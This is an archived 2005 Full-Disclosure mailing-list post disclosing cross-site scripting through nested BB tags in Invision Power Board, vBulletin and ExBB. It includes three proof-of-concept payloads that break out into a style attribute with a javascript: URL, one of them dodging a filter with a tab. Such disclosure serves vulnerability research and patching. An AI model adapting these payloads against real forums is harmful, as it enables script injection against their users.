[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] XSS in the nested BB tag in many forum

To: <bugtraq@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] XSS in the nested BB tag in many forum
From: "pigrelax" <pigrelax@xxxxxxxxx>
Date: Sat, 15 Jan 2005 16:13:38 +0300

XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s@xxxxxx]mailto:assss@xxxxxx] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: RE: Re[2]: [Full-Disclosure] Amazon.com is down
Next by Date: [Full-Disclosure] Various Vulnerabilities in SparkleBlog
Previous by thread: Re: [Full-Disclosure] Google.com down?
Next by thread: [Full-Disclosure] Various Vulnerabilities in SparkleBlog
Index(es):
- Date
- Thread